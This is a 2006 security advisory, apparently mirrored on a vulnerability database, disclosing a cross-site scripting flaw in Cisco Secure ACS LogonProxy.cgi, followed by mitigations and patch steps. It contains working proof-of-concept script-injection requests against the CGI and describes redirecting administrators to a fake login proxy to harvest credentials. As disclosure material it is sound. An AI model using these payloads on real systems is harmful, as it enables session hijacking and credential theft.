Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13233
HistoryJun 18, 2006 - 12:00 a.m.

Cisco Secure ACS Cross Site Scripting Vulnerability.

2006-06-1800:00:00
vulners.com
18
JSON

FUJITSU SERVICES SECURITY ADVISORY
DATE: 27-01-2006
AUTHOR: THOMAS LIAM ROMANIS
VENDOR: Cisco
PRODUCT: Cisco Secure ACS
VERSION(S) TESTED: Cisco Secure ACS version 2.3 UNIX hosted on Netscape FastTrack Server version 2.01c
on Sun Solaris 8.0
TITLE: Cisco Secure ACS LogonProxy.cgi Cross Site Scripting vulnerability.

Summary:
Cisco Secure ACS LoginProxy.cgi has been found to be vulnerable to Cross Site Scripting attacks via
both GET and POST requests due to a failure to properly filter undesirable user input. Successful
exploitation could result in a loss of privacy of sensitive data, such as usernames and passwords.

Detail:
Exploitation of this type of attack relies on the attacker’s ability to inject code (in this case java
script) into the HTML that is delivered to the user’s Internet Browser. In this case it is possible to
craft POST and GET requests to LogonProxy.CGI that result in detailed errors being presented in which
the requested URL (or Query) is displayed. Thus, it is possible to inject java script into the error
message which could be utilised to execute a Cross Site Scripting attack.
In this case the attack could not be used to steal session information (as it is commonly used) but it
could be used to redirect the user to another host. A possible scenario would be that the user is
redirected to a host owned by the attacker which hosts a copy of the Cisco Secure ACS front end. This
would then be used to proxy logon requests back to the bone fide server whilst harvesting
administrative user credentials.

Exploitation:
The following test scripts could be used to ascertain whether the system under test is vulnerable:

  1. POST Request.
    POST http://10.17.12.184:80/CScgi/LogonProxy.cgi HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
    Referer: http://10.17.12.184/cs/index.html
    Accept-Language: en-gb
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR
    1.1.4322)
    Host: 10.17.12.184
    Content-Length: 33
    Pragma: no-cache
    Server=0.0.0.0&error=<script>alert("help")</script>

  2. GET Requests.
    http://10.17.12.184/CScgi/LogonProxy.cgi?Server=0.0.0.0&amp;error=&lt;script&gt;alert&#40;&quot;help&quot;&#41;&lt;/script&gt;

http://10.17.12.184/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&amp;SSL=&lt;script&gt;alert&#40;&#39;help&#39;&#41;&lt;/script&gt;

http://10.17.12.184/CScgi/LogonProxy.cgi?Ok=&lt;script&gt;alert&#40;&#39;help&#39;&#41;&lt;/script&gt;

Recommendations: (Until patch information is available).
These recommendations are based on Cisco Secure ACS being used on an internal network rather than an
internet facing system.
• If possible reconfigure the system so that detailed error messages are not displayed in the
user’s internet browser.
• Network Architecture Design should ensure that only the IP addresses of hosts used by bone
fide Cisco Secure ACS users/Administrators can connect to these services.
• Consider dissemination of the attack string along side of controls in place on systems such as
e-mail (spoofing and HTML e-mail), Vulnerable web services (publication/uploading of malicious code),
exploitable applications (eg: guestbooks) and code published in MS Office document types.
• Consider whether current controls on desktops and servers are adequate to prevent users from
installing and controlling their own network services.
Recommendations supplied to the Vendor:
Logonproxy.cgi needs to have addition code added to filter out undesirable requests. The characters
which should be filtered in all forms (i.e. ASCII and UNICODE etc) to avoid Cross Site Scripting
attacks are: <,>,&gt,&lt,(,),”,/,=,:,;,

Vendor Recommendations:
A new version of fastadmin.zip will be made available by Cisco at the following location:
http://www.cisco.com/warp/public/707/cisco-sr-20060615-acs.shtml

Once you have downloaded this follow these instructions:

Steps to install the patch:

1) Stop the Ciscosecure process using $BASEDIR/utils/kcs
2) Create a backup of the existing file $BASEDIR/FastAdmin/fastadmin.zip
3) Copy the patch(fastadmin.zip) to the location $BASEDIR/FastAdmin
4) Start the CiscoSecure process using $BASEDIR/utils/scs

Final Comments:
Fujitsu Services would like to thank Paul Oxman and Cisco for their cooperation and professionalism.

JSON